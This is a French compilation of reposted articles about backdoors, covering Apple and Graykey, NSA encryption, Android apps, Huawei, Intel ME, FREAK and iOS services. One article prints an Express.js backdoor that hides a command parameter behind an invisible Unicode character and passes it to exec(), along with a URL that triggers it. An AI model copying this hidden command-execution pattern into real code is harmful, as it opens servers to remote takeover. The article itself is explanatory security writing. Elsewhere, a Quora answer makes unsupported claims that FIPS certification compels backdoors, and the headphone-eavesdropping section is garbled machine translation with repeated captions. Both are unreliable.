Apple a toujours refusé d’octroyer une porte dérobée aux autorités :

 

Apple a toujours refusé d’octroyer une porte dérobée aux autorités :

- Cet outil utilisé par la police peut-il débloquer votre iPhone ?

Une solution serait en mesure de pénétrer partiellement sur les smartphones d’Apple.

Publié le 21 novembre 2024 à 07:59

Par Jean-Yves Alric 

Apple a toujours adopté un politique de confidentialité et de protection de la vie privée très élevée. La firme de Cupertino ne déverrouille donc pas les iPhone pour les forces de l’ordre et ne leur fournit pas d’accès direct aux appareils protégés sous la forme d’une porte dérobée.

Un outil performant

Forcément, la police reste toutefois désireuse d’accéder aux données des smartphones pour ses enquêtes et recourt pour cela à des outils tels que Graykey, mis au point par la société Magnet Forensics. Nos confrères de 404 Media ont justement obtenu des documents qui reviennent en détail sur les fonctionnalités de cette solution.

De fait, les iPhone qui tournent sur iOS 18 et iOS 18.1 peuvent être déverrouillés partiellement par cet outil. Quant aux appareils tournant sur la version bêta d’iOS 18.1, ils sont en revanche classés comme « inaccessibles ».

Nous ignorons en revanche ce que le terme « partiel » recoupe et quelles données peuvent être récupérées sur l’iPhone. Il pourrait ainsi s’agir d’informations non chiffrées du téléphone. Notons que les smartphones qui ne sont protégés que par un code d’accès à 4 chiffres sont particulièrement vulnérables et peuvent être déverrouillés en seulement quelques minutes.

Comme le rappelle à juste titre MacRumors, un jeu du chat et de la souris est lancé entre Apple et ces outils de déchiffrage. En 2018, par exemple, la marque à la pomme avait pu désactiver Graykey via une mise à jour iOS 12. Mais la solution avait finalement trouvé des vulnérabilités qui lui avaient permis de restaurer l’accès.

Apple veut protéger la vie privée

Pour rappel, Apple a toujours refusé d’octroyer une porte dérobée aux autorités. Par exemple, en mai 2020, le géant de la Tech expliquait :

C’est parce que nous prenons notre responsabilité en matière de sécurité nationale si sérieusement que nous ne croyons pas à la création d’une porte dérobée — qui rendrait chaque dispositif vulnérable aux mauvais acteurs qui menacent notre sécurité nationale et la sécurité des données de nos clients. Il n’existe pas de porte dérobée réservée aux gentils, et le peuple américain n’a pas à choisir entre un affaiblissement du chiffrement et des enquêtes efficaces.

REF.: https://www.iphon.fr/

La NSA a-t-elle intégré des portes dérobées secrètes dans les nouvelles normes de cryptage pour mieux espionner les citoyens ?

 

La NSA a-t-elle intégré des portes dérobées secrètes dans les nouvelles normes de cryptage pour mieux espionner les citoyens ?

Bien sûr.

C'est leur travail.

Lorsque je travaillais chez Cisco, afin de vendre nos outils de sécurité de cryptage VPN au gouvernement, nous devions passer une série de « tests de sécurité » appelés « norme FIPS-140 ». Il s’agissait (il a depuis été remplacé par d’autres protocoles) d’un ensemble de règles très strictes que votre code doit respecter pour garantir que « l’ennemi » ne puisse pas le compromettre. Dans le cadre de la norme, vous devez leur fournir le code afin qu'ils puissent intégrer leur propre magie dans vos produits, leur permettant de faire ce qu'ils veulent quand ils veulent qu'ils fassent quelque chose. Même les capacités des portes dérobées et des ports Tap. Si vous voulez ce marché, et que vendre au gouvernement américain est tout simplement un marché énorme avec des milliards de dollars en jeu, alors vous essayez d'obtenir ces petites lettres « FIPS-140 Certified » sur votre fiche technique. Cela nécessite même que des étiquettes d'inviolabilité soient apposées sur le produit physique et sur les trous de vis afin que si quelqu'un essaie d'ouvrir le produit (pour fixer des sondes et ainsi de suite), cette falsification soit évidente. Dans CERTAINS cas, il comprend des circuits qui font quelque chose si le boîtier est réellement ouvert. Même les petites étiquettes d’inviolabilité sont sérialisées et ne peuvent donc pas être simplement remplacées. (Sur les commandes de lancement de missiles, il y a même une « alarme anti-sabotage » qui s'allume si le panneau de commande a été accédé, même s'il est autorisé. Un produit falsifié n'est plus fiable.

Oui, c'est vrai. Le gouvernement vous espionne. Ils espionnent tout le monde. Vous ne pouvez rien y faire. Rien. Tous les gouvernements collectent un certain nombre de données sur leurs citoyens. C’est pour cela que nous avons des « casiers judiciaires ». Certains le font simplement mieux que d’autres et lorsque vous atteignez la taille des États-Unis, cela devient un effort plus sérieux. Et dans un pays capitaliste où la technologie d’espionnage ne cesse de s’améliorer, la vie privée devient une chose du passé. Chaque fois que vous sortez, chez Walmart, à un match des Celtics au Garden ou à un grand concert, des caméras intelligentes vous surveillent et capturent tout ce qui vous concerne, en particulier les choses que vous ne pouvez pas modifier, comme votre démarche, votre taille et la forme de votre corps. vos oreilles - et votre visage. Ils les stockent et s’en souviennent pour toujours et peuvent, s’ils le souhaitent, rassembler toutes ces données.

Le problème n’est PAS l’espionnage. L'espionnage est facile. Le problème est l'analyse. Même les meilleurs systèmes d’IA du marché fabriqués par Milestone ont des limites. Vous ne pouvez pas conserver des pétaoctets de données actifs. Finalement, il est enregistré sur bande et stocké quelque part dans un entrepôt d’Iron Mountain à des fins de preuve. Au bout de sept ans, il est jeté.

Ne pensez pas que la Norvège, la Chine ou même le petit Belize n’espionnent pas tout le monde : ils le font. Tout le monde le fait. La seule différence est à quel point ils sont bons dans ce domaine.

Les États-Unis sont TRÈS bons.

REF.: quora.com

 

 

Une backdoor invisible en JavaScript

@Korben  —  8 janvier 2022

Des chercheurs du cabinet de consultig Certitude, ont mis au point une backdoor (porte dérobée) qui ne peut pas être détectée, car elle utilise un caractère Unicode invisible. La technique n’est pas nouvelle, mais c’est une bonne piqûre de rappel (c’est la mode en ce moment, les rappels).

Celui-ci peut ainsi être interprété comme une variable dans un bout de code JavaScript. En effet, à partir de la version 2015 d’ECMAScript, tous les caractères Unicode ayant la propriété « ID_Start » peuvent être utilisés dans des variables ou des constantes.

Ainsi, le caractère « ㅤ » (0x3164 en hexadécimal) qu’on appelle également « HANGUL FILLER » est considéré comme une lettre et possède cette propriété « ID_Start ».

Il ne reste plus qu’à l’utiliser dans du code JavaScript en échappant le caractère comme ceci :

const { timeout,u3164} = req.query;

Ainsi, dans ce code, on ne passe pas uniquement 1 paramètre « timeout » dans la requête, mais 2 paramètres : timeout et notre caractère Unicode invisible.

Ainsi, quand on observe ce code :

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

On peut voir que le caractère est appelé à 2 endroits. Je les ai mis en gras. Sur Visual Studio c’est un peu plus voyant, car ces caractères forment des carrés jaunes (lignes 8 et 11).

Chaque élément du tableau, les commandes en dur et le paramètre fourni par l’utilisateur du script sont ensuite transmis à la fonction exec qui exécute les commandes au niveau du système d’exploitation.

Grâce à notre caractère invisible, on peut lui passer une commande bonus comme ceci en ajoutant le paramètre 0x3164 URL-encoded, ce qui donne %E3%85%A4 :

http://host:8080/network_health?%E3%85%A4=METTEZ-ICI-NIMPORTE-QUELLE-COMMANDE

Et voilà, la commande supplémentaire sera alors exécutée sur le système.

Ainsi, la détection de ce genre de code invisible dépendra vraiment de l’éditeur utilisé pour afficher le code. Comme vous avez pu le voir, sous Visual Studio c’est visible, mais subtil.

Dans le même genre, il est également possible de tromper l’auditeur d’un code avec des caractères qui se ressemblent. Par exemple, ce symbole “ǃ” n’est pas un point d’exclamation, mais un caractère Unicode appelé ALVEOLAR CLICK. Vous retrouverez l’ensemble de ces codes baptisés « Confusables » ici.

Vous trouverez tous les détails concernant cette technique ici.

 

REF.:   https://korben.info/backdoor-invisible-javascript.html

Plus de 12 000 applications Android contiendraient des portes dérobées

Libellés

BackDoor, virus, samsung, Android,

Technologie : Plus de 12 000 applications Android disponibles notamment sur le Play Store contiendraient des portes dérobées permettant de pirater votre smartphone, comme le révèle une étude qui a de quoi faire frémir.

Par Catalin Cimpanu | Lundi 06 Avril 2020

Les applications Android sont-elles un nid de portes dérobées ? C'est le sombre constat que révèle une étude académique complète publiée cette semaine, qui a relevé des comportements cachés de type "backdoor" dans plus de 12 700 applications Android. Pour en arriver à ce nombre énorme, des universitaires européens et américains ont développé un outil personnalisé appelé InputScope, qu'ils ont utilisé pour analyser les champs de formulaires de saisie trouvés dans plus de 150 000 applications Android.
Les auteurs de cette étude ont notamment analysé les 100 000 applications installées le plus grand nombre de fois via le Play Store, les 20 000 meilleures applications hébergées sur des boutiques d'applications tierces, et plus de 30 000 applications préinstallées sur des téléphones Samsung. Le constat est sans appel selon eux : « l'évaluation a révélé une situation préoccupante. Nous avons identifié 12 706 applications contenant une variété de portes dérobées telles que des clés d'accès secrètes, des mots de passe administrateur et des commandes secrètes », ont-ils relevé.
Les chercheurs affirment que ces mécanismes de portes dérobées cachées pourraient permettre à des attaquants d'accéder sans autorisation aux comptes des utilisateurs. De plus, si l'attaquant a un accès physique à un appareil et que l'une de ces applications a été installée, il pourrait également accorder aux attaquants l'accès à un téléphone ou leur permettre d'exécuter du code sur l'appareil avec des privilèges élevés (en raison des commandes secrètes cachées présentes dans les champs de saisie de l'application).

publicité

Des mécanismes variés

« De tels cas ne sont pas hypothétiques », révèlent les chercheurs à l'origine de cette étude, en citant une liste non exhaustive de cas particuliers. « En examinant manuellement plusieurs applications mobiles, nous avons découvert qu'une application populaire de contrôle à distance (10 millions d'installations) contient un mot de passe principal qui peut déverrouiller l'accès même si le propriétaire du téléphone le verrouille à distance en cas de perte de l'appareil », ont déclaré les chercheurs.
« Pendant ce temps, nous avons également découvert qu'une application populaire de verrouillage d'écran (5 millions d'installations) utilise une clé d'accès pour réinitialiser les mots de passe arbitraires des utilisateurs afin de déverrouiller l'écran et d'entrer dans le système. « De plus, nous avons également découvert qu'une application de diffusion en direct (5 millions d'installations) contient une clé d'accès pour entrer dans son interface d'administrateur, grâce à laquelle un attaquant peut reconfigurer l'application et déverrouiller des fonctionnalités supplémentaires. »
« Enfin, nous avons découvert qu'une application de traduction populaire (un million d'installations) contient une clé secrète permettant de contourner le paiement de services avancés tels que la suppression des publicités affichées dans l'application. Comme le montrent les exemples fournis par l'équipe de recherche, certains problèmes représentent clairement un danger pour la sécurité de l'utilisateur et les données stockées sur l'appareil, tandis que d'autres n'étaient que des œufs de Pâques inoffensifs ou des fonctionnalités de débogage qui ont accidentellement été mises en production.

Plus de 12 000 applications concernées

Au total, les chercheurs ont déclaré avoir trouvé plus de 6 800 applications avec des portes dérobées/fonctions cachées sur le Play Store, plus de 1 000 sur des magasins tiers et près de 4 800 applications préinstallées sur des appareils Samsung. L'équipe de recherche à l'origine de cette étude a déclaré qu'elle avait informé tous les développeurs d'applications où elle avait trouvé un comportement caché ou un mécanisme de type porte dérobée. Cependant, tous les développeurs d'applications n'ont pas répondu.
Par conséquent, certaines des applications citées en exemple dans le livre blanc de l'équipe ont vu leur nom édité pour protéger leurs utilisateurs. Des détails supplémentaires sur cette recherche sont disponibles dans un article de recherche intitulé "Automatic Uncovering of Hidden Behaviors FromInput Validation in Mobile Apps", publié par des chercheurs de l'Université d'État de l'Ohio, de l'Université de New York et du Centre Helmholtz pour la sécurité de l'information de la CISPA en Allemagne.
Comme l'outil InputScore analysait les champs de saisie dans les applications Android, l'équipe universitaire a également découvert quelles applications utilisaient des filtres de mots indésirables cachés ou des listes noires à motivation politique. Au total, les chercheurs ont déclaré avoir trouvé 4 028 applications Android qui comportaient des listes noires de saisie.

Source : ZDNet.com

Huawei : ses équipements 5G présentent une lourde faille de sécurité 

par Guillaume Pigeard, le 12 février 2020 

 

Libellés

5G, Huawei, BackDoor, hackers Chinois, failles, Kill Switch, 4G,

Après de longues années de suspicion quant à la possibilité pour Huawei et donc pour le gouvernement chinois d’accéder aux données circulant via ses équipements 5G, les États-Unis annoncent en avoir maintenant la preuve.

D’après les services de renseignement américains, le constructeur chinois Huawei aurait utilisé des portes dérobées, ces fameux backdoors, mises en place sur ses équipements réseau 4G depuis une dizaine d’années. Huawei nie en bloc.

Huawei aurait utilisé des backdoors depuis 2009

Depuis 2009, Huawei aurait utilisé les accès mis en place pour les forces de l’ordre au sein des équipements 4G vendus à travers le monde afin de collecter des données personnelles sensibles. C’est en tout cas ce qu’a déclaré Robert O’Brien, conseiller à la sécurité nationale américaine. Évidemment, le constructeur chinois rejette ces accusations sans pour l’instant communiquer davantage.

Samsung Galaxy S10 : recharger un autre téléphone, c'est rapide ?

Les liens étroits qui unissent Huawei au gouvernement communiste chinois avaient conduit l’administration américaine à mettre le constructeur sur liste noire en mai dernier, l’interdisant de faire commerce avec des entreprises américaines. Cela se traduit pour le grand public par l’absence des services Google des derniers smartphones de la marque chinoise, obligeant celui-ci à pousser ses propres solutions. D’autres constructeurs avaient suivi les recommandations américaines.
Les États-Unis avaient averti les pays européens dès la fin de l’année dernière. Pourtant le Royaume-Uni et l’Allemagne ont tout de même autorisé l’utilisation d’équipements Huawei pour la mise en place du réseau 5G. Toutefois, un certain nombre de restrictions ont été imposées, comme une limite de ces équipements à 35 % du total ou l’interdiction de leur utilisation dans certaines zones géographiques stratégiques. Malgré la pression de Pékin, la France maintient son interdiction. Son inscription sur liste noire n’a pas empêché le constructeur chinois de réaliser un chiffre d’affaires record sur l’année écoulée.

Source. : CNET

Le mystérieux hack réussi par la Chine

REF.: heso59 - lundi 8 octobre 2018 - 14:22

Le mystère s'épaissit sur le piratage par la Chine des plus grands géants de la high tech comme Amazon et Apple.

 

Libellés

hackers Chinois, Amazon Web Services, apple, BackDoor

 




(CCM) — Apple et Amazon feraient partie des grandes entreprises américaines victimes d'un piratage massif de leurs serveurs. Pour parvenir à leurs fins, les hackers d'origine chinoise auraient implanté des puces directement dans les cartes mères SuperMicro des serveurs de ces entreprises. Pour s'en servir ensuite de « porte dérobée » et accéder aux données des géants technologiques américains.

D'après les informations recueillies par l'agence américaine Bloomberg (lien en anglais), les cartes-mères SuperMicro sont en cause dans ce hack d'une ampleur inédite. Numéro 1 mondial des cartes-mères pour serveurs de datacenters, la marque est une référence utilisée par la quasi-totalité des acteurs du cloud. Mais elle n'est apparemment pas infaillible. Des pirates auraient réussi à infiltrer son processus de fabrication pour installer une puce sur les circuits.

Cette puce est alors destinée à servir de backdoor et à communiquer avec des serveurs basés en Chine. Parmi la trentaine d'entreprises ciblées par le piratage, Amazon et Apple figurent en bonne place, aux côtés d'établissements financiers américains. Les révélations de ce piratage « de l'intérieur » jettent le trouble sur la fiabilité des datacenters impactés. Un total de 7 000 serveurs Apple potentiellement impactés est évoqué. En conséquence, les utilisateurs des services de cloud Amazon ou Apple peuvent s'interroger sur la réelle protection de leurs données personnelles ou professionnelles dans le cas d'entreprises clientes.


REF.:

Un smartphone Android acheté, une backdoor chinoise offerte

Trop fort les Chinois !
Les chercheurs en sécu de Kryptowire viennent de découvrir une backdoor bien planquée dans le firmware de la plupart des smartphones chinois petit budget vendus aux États-Unis. Et que fait cette backdoor ? Et bien elle collecte des infos comme le journal des appels, les SMS, la liste des contacts, l'historique de géolocalisation, les données des applications...etc. et balance tout discrètement toutes les 72 heures à un serveur localisé en Chine.
Ahahah, sacrée opération d'espionnage à grande échelle. D'ailleurs, ce serait environ 700 millions d'appareils qui seraient concernés par ce problème. Le firmware en question aurait été mis au point par la société AdUps Technology localisée à Shanghai et équiperait des téléphones de la marque ZTE, Huawei...etc.
Le plus beau là-dedans, c'est que ce même firmware permet d'installer et de mettre à jour à distance des applications directement sur le téléphone, mais aussi de lancer des commandes root à distance. Toujours d'après les chercheurs qui l'ont analysé, ce serait une backdoor intentionnelle et non pas une erreur de programmation ou une faille de sécurité. En tout cas, une chose est sûre, la backdoor ne peut pas être supprimée ou désactivée.
Ça me rappelle Carrier IQ qui en 2011 avait fait parlé de lui, avec une backdoor de ce genre. D'ailleurs, AdUps va beaucoup plus loin que Carrier IQ.

Maintenant reste à savoir si ces données récupérées le sont à des fins de tracking publicitaire ou à des fins d'espionnage étatique. En tout cas, AdUps a réagi en expliquant que cette fonctionnalité n'était pas destinée au marché américain mais uniquement au marché chinois pour aider les fabricants de smartphones à monitorer les comportements des utilisateurs.
Lolilol
source .:

Hackers: On peut transformer les écouteurs en MICROPHONE et laisser les pirates vous entendre dans une pièce

http://www.dailymail.co.uk/sciencetech/article-3962856/Software-turn-headphones-MICROPHONE-let-hackers-listen-room.html#v-2002156539328089529

 Un logiciel peut transformer vos écouteurs en MICROPHONE et laisser les pirates vous entendre dans une pièce

    Les chercheurs ont construit un code qui transforme les sorties d'un ordinateur en entrées
    Cela permet de faire tourner les écouteurs à la prise de sortie dans un microphone
    L'équipe a utilisé une paire de casques pour capturer les vibrations dans l'air
    Ensuite, les convertit en signaux électromagnétiques pour enregistrer de l'audioPublié Par:  Stacy Liberatore Pour Dailymail.comPublié: 00:35 BST, 23 novembre 2016 | Mis à jour: 00:41 BST, 23 novembre 2016

   Voir les commentairesUne nouvelle expérience démontre la facilité avec laquelle les pirates peuvent transformer votre casque en un microphone pour ignorer inconsciemment en arrière-plan.Le chercheur a conçu un code appelé 'Speake (a) r, qui' réattribue 'les sorties d'un ordinateur aux entrées, ce qui leur permet d'enregistrer de l'audio même si le casque était dans la prise de sortie uniquement.L'équipe a utilisé une paire de casques pour capturer les vibrations dans l'air et les a transformées en signaux électromagnétiques pour enregistrer l'audio à partir de 20 pieds dans une pièce.Défilement vers le bas pour la vidéoLe chercheur a conçu un code appelé «Speake (a) r, qui« réattribue »les sorties d'un ordinateur aux entrées, ce qui leur permet d'enregistrer de l'audio même lorsque les écouteurs sont dans la prise de sortie uniquement. L'équipe a démontré qu'elle pouvait enregistrer 20 pieds audio sur une pièce+5Le chercheur a conçu un code appelé «Speake (a) r, qui« réattribue »les sorties d'un ordinateur aux entrées, ce qui leur permet d'enregistrer de l'audio même lorsque les écouteurs sont dans la prise de sortie uniquement. L'équipe a démontré qu'elle pouvait enregistrer 20 pieds audio sur une pièceCOMMENT LE FAIT-IL?L'Université Ben Guiron démontre comment la plupart des PC et des ordinateurs portables sont susceptibles aujourd'hui de ce type d'attaque.L'équipe a conçu un code appelé 'Speake (a) r qui utilise vos écouteurs pour capturer les vibrations dans l'air et les convertit en signaux électromagnétiques qui captent l'audio.L'équipe a accédé à une fonctionnalité de l'ordinateur avec le malware - les écrans de codec audio RealTek, caractéristique commune dans la plupart des ordinateurs.Cela leur permet d'entrer dans l'ordinateur et d'inverser sa fonction de sortie à l'entrée, ce qui leur permet de goutte à goutte sans jamais être découpé.Ceux qui sont sceptiques quant aux pirates qui attaquent leurs systèmes et les surveillent auront beaucoup de temps pour les garder à distance.Un exemple est le PDG de Facebook, Mark Zuckerberg, qui a placé un morceau de bande sur la caméra de son ordinateur, car il est sûr que les pirates lui regardent.Mais maintenant, nous pourrons bientôt voir Zuckerberg renoncer à tous les écouteurs maintenant qu'il est possible que cybertheives les utilise contre lui.«Le fait que les écouteurs, les écouteurs et les haut-parleurs soient physiquement construits comme des microphones et que le rôle d'un port audio dans le PC puisse être reprogrammé de la sortie à l'entrée crée une vulnérabilité qui peut être abusée par les pirates», explique le professeur Yuval Elovici, directeur de la BGU Cyber ​​Security Research Center (CSRC) et membre du Département de l'ingénierie des systèmes d'information de BGU.
  
Http://www.dailymail.co.uk/sciencetech/article-3962856/Software-turn-headphones-MICROPHONE-let-hackers-listen-room.html#v-2002156539328089529Andy Greenberg avec Wired explique que l'équipe a accédé à une fonctionnalité de l'ordinateur en utilisant les logiciels malveillants expérimentaux - les écrans de codecs audio RealTek, qui est une caractéristique commune dans la plupart des ordinateurs et des lattes.Cela leur permet d'entrer dans l'ordinateur et d'inverser sa fonction de sortie à l'entrée, ce qui leur permet de goutte à goutte sans jamais être découpé.L'équipe montre qu'ils ont complètement supprimé les haut-parleurs avant d'accéder aux ordinateurs RealTek audio codec chips en utilisant son code expérimental. Les puces de codec audio RealTek sont des fonctionnalités communes dans de nombreux ordinateurs et ordinateurs portables+5L'équipe montre qu'ils ont complètement supprimé les haut-parleurs avant d'accéder aux ordinateurs RealTek audio codec chips en utilisant son code expérimental. Les puces de codec audio RealTek sont des fonctionnalités communes dans de nombreux ordinateurs et ordinateurs portablesLes recherches ont expliqué à Greenberg que ce type de piratage est si fréquent que l'attaque fonctionne sur presque tous les ordinateurs, peu importe s'il s'agit de Windows ou MacOS - il est également possible de réaliser des ordinateurs portables.Au cours de leur expérience, l'équipe a utilisé une paire de casques Sennheiser et a constaté qu'ils pouvaient capturer de l'audio dans une pièce à source qui était à 20 pieds de l'ordinateur - même s'ils avaient complètement enlevé les haut-parleurs.Les écouteurs ont été transformés en haut-parleurs de l'ordinateur et ont converti les vibrations dans l'air en signaux électromagnétiques pour capter clairement l'audio sur toute la pièce. Les chercheurs ont trouvé qu'il était possible de compresser l'enregistrement et de l'envoyer sur le Web+5Les écouteurs ont été transformés en haut-parleurs de l'ordinateur et ont transformé les vibrations dans l'air en signaux électromagnétiques.


Des exemples:
La domotique ,le caméra wifi et les speakers bluetooth avec interconnection par cellulaire,vous devez le désactiver car c'est un backdoor dormant,...........c'est de la merde !

Le hacker peut s'amuser avec le speaker pour vous écouter et quand il vous entend ronfler ,il vous envoit des sons gossant dans vos speakers par onde cellulaire ! Ça vaut la peine a ce moment de réinitialler votre cell !



 Source.:

Intel embarque-t-il une porte dérobée dans toutes ses puces ? La Management Engine ou la Damagement Engine ?

 

Julianprescott2604juuly (Creative Commons)

De plus en plus d’experts critiquent ouvertement le composant Management Engine qu’Intel embarque dans tous ses chipsets récents. C’est un ordinateur dans l’ordinateur, doté d’énormes privilèges d’accès et dont le code est complètement opaque.

La communauté du logiciel libre tire la sonnette d’alarme. Selon elle, la sécurité de la plupart de nos équipements informatiques est compromise, et les coupables sont tout désignés : les puces Intel de dernière génération. Plusieurs porte-paroles de la communauté libre ont récemment publié des notes de blog au vitriol sur un composant bien étrange qui se trouve désormais intégré dans les CPU d’Intel : le « Management Engine » (ME).
Pour les partisans du libre, cette petite entité – qui est censée fournir tout une ensemble de services de sécurité (Trusted Platform Module) et d’administration à distance (Active Management Technology) – est le diable en silicium. C’est un véritable ordinateur à l’intérieur de l’ordinateur. Il dispose de son propre système d’exploitation (propriétaire) et de ses propres interfaces réseaux (adresse MAC). Il a un accès direct à la mémoire du PC et peut prendre son contrôle à n’importe quel moment. Et, bien sûr, il ne peut jamais être désactivé.
Bref, c’est le mouchard idéal. « Il peut allumer ou éteindre le PC, ouvrir tous les fichiers, examiner toutes les applications lancées, connaître les mouvements de la souris et l’enfoncement des touches de clavier, et même capturer ou insérer des images sur l’écran », explique Leah Woods, développeuse en chef de Libreboot, dans une note de blog de la Free Software Foundation. Libreboot est un BIOS libre que Leah Woods et ses amis installent sur des PC Linux que l’on peut acheter sur Minifree.org.

Un code impossible à remplacer

La deuxième salve anti-Intel est venue de Damien Zammit, qui participe également au projet Libreboot. Pour ce développeur, ME est une dangereuse boîte noire qui, si elle est compromise par un attaquant, permet d’installer des portes dérobées (rootkit) « quasi indétectables et imparables », explique-t-il sur le site boingboing.net. Dans l’idéal, Damien Zammit aimerait bien sûr se débarrasser du code propriétaire d’Intel et installer son propre système sur le ME. Malheureusement, c’est impossible car le firmware du ME est vérifié par une ROM secrète intégrée dans le chipset, au travers d’un algorithme de signature électronique basé sur RSA 2048 bits. « Toutefois, il y a peut-être un bug que l’on peut exploiter dans cette ROM », espère Damien Zammit.
Si les développeurs de Libreboot sont tellement vent debout contre ME, c’est parce que cette technologie annihile tous leurs efforts. Leur but est de créer des ordinateurs où toutes les couches informatiques sont libres et open source : le matériel, le BIOS, le système d’exploitation, les applications. Le ME représente, de ce point de vue, un obstacle incontournable.

Tous des PC zombies

Des chercheurs en sécurité ont également planché sur ce problème. C'est notamment le cas de Joanna Rutkowska. En décembre dernier, à l’occasion de la conférence 32C3, cette chercheuse d'Invisible Things Labs a détaillé le fonctionnement du Management Engine d'Intel et listé ses différentes voies d’accès dans le PC. On voit bien que le ME dispose de privilèges hors du commun, alors que « personne ne sait ce qu’il y a dedans ».  

Joanna Rutkowska -

Pour Joanna Rutkowska, le ME « n’est pas seulement un redoutable vecteur d’attaque, il transforme également tous nos PC en PC zombies ». Selon elle, le but d’Intel est d’inverser le modèle d’implémentation actuel, où le système d’exploitation et les applications prennent en charge les traitements de données sensibles, comme le chiffrement ou la génération de nombres aléatoires.
Ces traitements seraient alors progressivement transvasés vers le matériel et, notamment, le ME. « Le code du ME n’est pas forcément malveillant, mais peut-être qu’il contient des erreurs, peut-être que l’implémentation n’a pas été faite de manière correcte. Intel, évidemment, pense que tout ce qu’il fait est forcément sécurisé… », souligne-t-elle.  

Joanna Rutkowska -

Pour sa part, Joanna Rutkowska a proposé un modèle d’implémentation matérielle alternatif orienté vers une sécurité maximale. Son PC idéal est celui qui ne garde aucune donnée de manière persistante (« stateless hardware »). Les données persistantes sont stockées sur des « clés USB de confiance » (« trusted sticks »).
En définitive, cette puce omnipotente et totalement opaque, la Management Engine, s'avère inquiétante. On comprend assez facilement pourquoi Damien Zimmer la surnomme la Damagement Engine. Un processeur qui, au-delà de son but premier, menace et fragilise votre sécurité et celle de votre machine...
Sources.:
Boingboing, FSF
Joanna Rutkowska: article sur la technologie Intel, article sur l’architecture PC non persistante    

Une Faille des années 90 rend votre Android Browser nul et le restera pour le reste de la vie de votre cell

Une porte dérobée de la NSA met en danger les utilisateurs de Safari et Android

Une faille baptisée « Freak » permet de casser le chiffrement de connexions web sécurisées en OpenSSL. Elle trouve son origine dans un affaiblissement cryptographique, inséré volontairement par la NSA au siècle dernier.

 

agrandir la photo

Panique à bord chez Apple et Google. Un groupe de chercheurs en sécurité a découvert que les navigateurs Web Safari , Chrome (sauf la dernière version 41) et Android Browser (le navigateur par défaut du smartphone) sont vulnérables à des attaques de type « man in the middle » en se connectant à environ 5 millions de sites web sécurisés en TLS/SSL. Et ce n’est pas tout : ils peuvent également être victimes d’attaques par injection de code sur un grand nombre de sites sécurisés dotés du bouton « Like » de Facebook. Parmi les sites touchés : americanexpress.com, vente-privee.com, orange-labs.fr, ce-orange.fr, bouyguestelecom.fr, m6mobile.fr, lapostemobile.fr, groupama.fr, bamibanque.fr, videofutur.fr, interflora.fr, etc.

Des clés de chiffrement limitées à 512 bits

Mais le plus surprenant : cette terrible faille provient d’une porte dérobée créée par le gouvernement américain... dans les années 90 ! A cette époque, Netscape venait de lancer le premier navigateur grand public, ainsi que le protocole sécurisé SSL, qui allait faire le bonheur de l’e-commerce. Mais le pays de l’oncle Sam était très chatouilleux sur l’exportation de technologies de chiffrement, en particulier de l’algorithme RSA utilisé dans SSL. Hors Etats-Unis, celui-ci était donc limité à des clés 512 bits appelées « RSA Export Keys ». C’était suffisant pour protéger les échanges commerciaux, tout en permettant à la NSA de déchiffrer les flux si elle le voulait. Mais aujourd’hui, cette longueur de clé est ridicule : il suffit d’investir une centaine de dollars en serveurs virtuels sur Amazon.com, et on la casse en quelques heures.

Le site de la NSA, modifié à la volée après avoir cassé le chiffrement SSL.

agrandir la photo

Et c’est exactement ce qu’ont fait les chercheurs en sécurité en se connectant sur le site Web... de la NSA (voir ci-dessus). Car figurez-vous qu’un grand nombre de sites Web proposent encore aujourd’hui ces clés RSA au rabais, par souci de rétrocompatibilité. Normalement, cela ne pose pas un grand problème, car dans les navigateurs modernes, la connexion TLS/SSL se crée toujours avec le plus haut niveau de chiffrement disponible, et généralement avec une taille de clé supérieure à 1024 bits.

Mais un bug découvert dans les implémentations d’OpenSSL de Safari et d’Android Browser permet de forcer le navigateur à accepter les clés 512 bits. Un attaquant peut donc, dans un premier temps, casser la clé RSA 512 bits récupérée auprès d’un serveur web. Puis, grâce au bug, intercepter et déchiffrer les flux d’un utilisateur qui s’y connecte (car le serveur utilise toujours la même clé RSA 512 bits). Il pourra donc récupérer des données sensibles, ou modifier les pages à la volée.

Le même bug se trouve également dans le kit de développement Facebook Javascript SDK, utilisé pour insérer des boutons « Facebook Login » ou « Facebook Like » dans les pages Web. Dans ce cas, la faille permet d’injecter n’importe quel code Javascript et, par exemple, récupérer des codes d’accès. Comme elle est liée aux clés RSA 512 bits, cette faille a été baptisée « Freak », pour « Factoring RSA Export Keys ».

Un patch Apple la semaine prochaine

Comment se protéger ? Facebook a d’ores et déjà mis à jour son SDK, tout comme Google qui vient de publier Chrome 41. Apple devrait publier un patch de sécurité pour Safari la semaine prochaine. Pour Android Browser, en revanche, ce sera plus compliqué, (faut changer de cell sinon ce sera comme la faille heartbleed a fallu Android Kitkat)car le processus de mise à jour dépend des constructeurs de smartphone, dont la réactivité est très variable. En cas de doute, rendez vous sur le site freakattack.com pour tester votre navigateur.

 

 Voici pour Firefox:

 

 

 

 

En attendant, il faut éviter d’utiliser les navigateurs intégrés dans les applications et préférer, par exemple, Chrome ou Firefox. Par ailleurs, il veut mieux se tenir à distance des réseaux à l'accès peu sécurisés, comme les hots spots publics. « Cette faille est embarrassante mais pas très grave, car elle peut être comblée assez rapidement. Cette histoire montre aussi que la création de portes dérobées est une très mauvaise idée. Au final, elles échappent toujours au contrôle de celui qui les a créées », souligne Jérôme Saiz, expert du Cercle européen de la sécurité et des systèmes d’information. C’est d’ailleurs le message qu’ont voulu faire passer les chercheurs en sécurité en s’attaquant au site Web de la NSA...

Source.:

600 millions d'appareils Apple ont des backdoors !

Les backdoors d'iOS révélées à la conférence HOPE/X

 

Jonathan Zdziarski, un expert de la police scientifique américaine, a fait une annonce étonnante à la conférence Hackers On Planet Earth (HOPE/X) qu'iOS contiendrait de nombreuses backdoors qui pourraient permettre à Apple et au gouvernement de récupérer des données privées. Un certain nombre de services tournants sur iOS, sans besoin d'être dans un mode développeur, permettraient d'extraire des données du mobile et de les récupérer grâce à des outils de la police scientifique.
Par exemple, comme Jonathan l'explique dans sa présentation dont les slides sont disponibles ICI.

• com.apple.pcapd qui snif et dump toute l'activité réseau (un sniffer serait donc intégré à 600 millions d'appareils)
